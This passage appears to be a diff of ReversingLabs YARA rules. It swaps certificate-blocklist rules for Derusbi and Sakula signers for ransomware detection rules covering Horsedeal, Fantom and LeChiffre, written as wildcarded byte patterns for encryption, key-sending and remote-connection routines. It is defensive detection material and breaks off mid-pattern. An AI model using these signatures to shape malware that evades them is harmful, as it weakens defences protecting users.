-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RuN APps FOrEver lld" and pe.signatures [ i ] . serial == "03:94:38:58:21:8f:35:ad:b7:07:3a:60:27:55:56:21" and 1480550399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and $decrypt_payload_script and ( all of ( $remote_connection_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_09813Ee7318452C28A1F6426D1Cee12D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Horsedeal : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Horsedeal ransomware."
 		author = "ReversingLabs"
-		id = "db3c1992-b6a1-5aaf-ae3a-c626b531529a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c722bc5b-756e-5d46-8530-e20ebb73737c"
+		date = "2020-10-01"
+		modified = "2020-10-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1996-L2012"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "89eb019192f822f9fe070403161d81e425fb8acdbc80e55fa516b5607eb8f8c7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Horsedeal.yara#L1-L106"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fa8c425b08606399b5dc7673f3898e3dba7efb6a62e56db8f500cf5072bb590b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Horsedeal"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Saly Younes" and pe.signatures [ i ] . serial == "09:81:3e:e7:31:84:52:c2:8a:1f:64:26:d1:ce:e1:2d" and 1455667199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_476Bf24A4B1E9F4Bc2A61B152115E1Fe : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing Derusbi malware."
-		author = "ReversingLabs"
-		id = "a41e8196-f5ad-5046-82ac-38c6fe753bdb"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2014-L2030"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ec0f44d2a7a53ad5653334378b631abde1834ebfcf72efcdcce353c6b9ae17d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_processes = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D
+            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53
+            FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF B5 ?? ?? ??
+            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5B 56 FF 15 ??
+            ?? ?? ?? 5E C9 C3
+        }
+		$enum_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? E8 ?? ?? ??
+            ?? 8B F0 85 F6 74 ?? EB ?? 33 DB 39 5C 24 ?? 76 ?? 8D 7E ?? F6 47 ?? ?? 74 ?? 8D 47
+            ?? 50 E8 ?? ?? ?? ?? EB ?? FF 37 E8 ?? ?? ?? ?? 43 83 C7 ?? 59 3B 5C 24 ?? 72 ?? 8D
+            44 24 ?? 50 56 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ??
+            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57
+            8B 7D ?? 74 ?? 68 ?? ?? ?? ?? 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ??
+            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83
+            C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
+            44 24 ?? 50 FF D6 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ??
+            50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B CB E8 ?? ??
+            ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 83 C4 ?? 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 8B F0 89 74 24 ?? 83 FE ?? 74 ?? 57 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ??
+            ?? ?? FF D7 50 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 FF 35
+            ?? ?? ?? ?? FF D7 8B 7C 24 ?? 50 FF 35 ?? ?? ?? ?? 57 FF D6 57 FF 15 ?? ?? ?? ?? 8B
+            CB E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 FF 35 ?? ?? ?? ??
+            8B F9 89 7D ?? FF D6 FF 35 ?? ?? ?? ?? 8B D8 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF
+            D6 3B C3 0F 84 ?? ?? ?? ?? 6A ?? 59 33 DB 89 4D ?? 8B C3 88 9C 05 ?? ?? ?? ?? 40 3D
+            ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 51 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 89 45 ?? 8A 84 0D ?? ?? ?? ?? 88 44 0D ??
+            41 83 F9 ?? 72 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 58 50 53 6A ?? 68 ?? ?? ?? ??
+            57 89 45 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 57 FF D6
+            8D 0C 47 83 E9 ?? 66 83 39 ?? 75 ?? FF 35 ?? ?? ?? ?? 2B CF 83 C1 ?? D1 F9 8D 04 4F
+            50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF 35 ?? ?? ?? ?? FF D6 FF 75 ?? 8B F0 FF
+            15 ?? ?? ?? ?? 3B C6 75 ?? 33 F6 46 EB ?? 8B 75 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
+            8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 33 F6 46 85 F6 74 ?? 8B 35
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+        }
+		$encrypt_files_p2 = {
+            53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF
+            75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 81 7D ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 6A ??
+            6A ?? 51 0F 57 C0 50 66 0F 13 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 2D ?? ?? ?? ?? 8B 35 ??
+            ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 DA ?? 89 45 ?? 8B 45 ?? 2D ?? ?? ?? ?? 89 55 ?? 89 45
+            ?? 8D 45 ?? 83 D9 ?? 89 45 ?? 89 4D ?? 6A ?? 6A ?? FF 70 ?? FF 30 53 FF D7 6A ?? 8D
+            45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D
+            55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A
+            ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8B
+            45 ?? 83 C0 ?? 83 6D ?? ?? 89 45 ?? 75 ?? 8B 7D ?? 0F 57 C0 6A ?? 6A ?? 66 0F 13 45
+            ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A
+            ?? 8D 45 ?? 50 53 FF D6 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF
+            D6 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ??
+            ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 57 FF 15 ?? ??
+            ?? ?? 8B CE E8 ?? ?? ?? ?? 5F 5E 5B C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" and 1414454399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_processes ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7Bd55818C5971B63Dc45Cf57Cbeb950B : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Fantom : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Derusbi malware."
+		description = "Yara rule that detects Fantom ransomware."
 		author = "ReversingLabs"
-		id = "9269cc5c-039e-5d98-ac13-c7b99606e7fa"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "cd32de8b-2c14-5fb4-be79-365d9848f341"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2032-L2048"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5aa41a2d6a86a30559b36818602e1bdf2bfd38b799a4869c26c150052d6d788c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Fantom.yara#L1-L97"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f2aaa9776b7ca302052b3303d45df24cc151a4efc7ea9f4bb3c1f53d10ded03a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Fantom"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL Games Co.,Ltd." and pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" and 1371513599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4C0B2E9D2Ef909D15270D4Dd7Fa5A4A5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing Derusbi malware."
-		author = "ReversingLabs"
-		id = "97005464-1219-56d7-bd5c-f047558be1dc"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2050-L2066"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9c74eb025bb413503b97ffdba6f19eadecf3789ce3a5d5419f84e32e25c9b5b1"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_1 = {
+            00 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ??
+            26 DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 28
+            ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? [1-2] 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 [1-2] 20
+            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 02 7B
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ??
+            ?? ?? 13 ?? 11 ?? 16
+        }
+		$encrypt_files_2 = {
+            72 ?? ?? ?? ?? A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ??
+            19 72 ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11
+            ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11
+        }
+		$lockfile = {
+            02 7B ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 21 EA 17 ?? ?? ?? ?? ?? ?? ??
+            03 73 ?? ?? ?? ?? [2-4] 6F ?? ?? ?? ?? [2-4] 21 00 65 CD 1D
+            00 00 00 00 FE ?? 16 FE ?? 2D ?? [2-4] FE ?? 16 FE ?? 2D ?? 03 28
+            ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? ?? ?? ?? [1-2]
+            6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 [1-2] 28 ?? ??
+            ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? [1-2] ?? FE ??
+            16 FE ?? 2D ?? 2B ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            2B ?? 03 28 ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ??
+            ?? ?? ?? [1-2] 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03
+            [1-2] 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            2A
+        }
+		$lockdir = {
+            03 28 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 0B 16 0C 08 06 8E 69 FE ?? 2C ??
+            00 06 08 9A 28 ?? ?? ?? ?? 0D 05 09 28 ?? ?? ?? ?? 16 FE ?? 2D ?? 02 25
+            7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 06 08 9A 04 28 ?? ?? ?? ?? DE ??
+            26 DE ?? 26 DE ?? 08 17 58 0C 2B ?? 16 0C 08 07 8E 69 FE ?? 2C ?? 00 02
+            07 08 9A 04 05 28 ?? ?? ?? ?? 02 07 08 9A 04 28 ?? ?? ?? ?? DE ?? 26 DE
+            ?? 26 DE ?? 08 17 58 0C 2B ?? 2A
+        }
+		$sendkey = {
+            00 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ??
+            0C 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ??
+            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 07 03 72 ?? ?? ?? ?? 08
+            6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fuqing Dawu Technology Co.,Ltd." and pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" and 1372118399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $encrypt_files_* ) ) and $lockfile and $lockdir and $sendkey )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5E3D76Dc7E273E2F313Fc0775847A2A2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Lechiffre : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Sakula and Derusbi malware."
+		description = "Yara rule that detects LeChiffre ransomware."
 		author = "ReversingLabs"
-		id = "93707307-a250-526d-a3d4-32ed5d2a63a6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "5d2698fe-9a0b-549d-9a83-72e2ccfc1966"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2068-L2084"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b943057fc3e97cfccadb4b8f61289a93b659aacf2a40217fcf519d4882e70708"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.LeChiffre.yara#L1-L123"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0b96f5f48700f2cba22da91187b3111946074e9cc58a502f25d7b96059a043cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LeChiffre"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NexG" and pe.signatures [ i ] . serial == "5e:3d:76:dc:7e:27:3e:2f:31:3f:c0:77:58:47:a2:a2" and 1372723199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_47D5D5372Bcb1562B4C9F4C2Bdf13587 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing Sakula malware."
-		author = "ReversingLabs"
-		id = "d888478e-3883-5d9d-a2b3-d59b57409b8d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2086-L2102"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fb4994647a2ed95c73625d90315c9b6deb6fb3b81b4aa6e847b0193f0a76650c"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 8B 45 ?? 33 D2 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45
+            ?? 8B 08 FF 51 ?? 8B 45 ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B
+            D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 45
+            ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 E8 ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? 59 E8 ??
+            ?? ?? ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection_2 = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33
+            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? 8B 80 ?? ?? ?? ?? 66 BE ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
